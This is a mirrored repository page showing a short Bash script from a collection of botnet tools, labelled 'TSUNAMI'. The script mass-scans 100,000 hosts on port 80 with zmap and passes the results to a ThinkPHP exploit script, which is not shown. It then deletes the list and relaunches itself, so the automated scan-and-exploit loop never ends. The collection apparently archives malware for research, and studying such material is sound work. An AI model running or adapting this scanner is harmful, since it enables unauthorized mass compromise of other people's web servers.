6
0
mirror of https://github.com/threatland/TL-BOTS synced 2024-06-27 09:20:07 +00:00
TL-BOTS/TL.EXPLOIT_SCAN/EXPLOIT.ThinkPHP/thinkphp.ddcf3d.sh

10 lines
218 B
Bash
Raw Normal View History

2019-10-02 20:41:26 +00:00
#!/bin/bash
clear
echo -e "\e[1;97m[\e[1;36mTSUNAMI\e[1;97m] \e[1;36mNow Auto-Scanning ThinkPHP"
zmap -p80 -o list.txt -B100M -N 100000
ulimit -n 999999
python thinkphp.py list.txt
rm -rf list.txt
clear
sh thinkphp.sh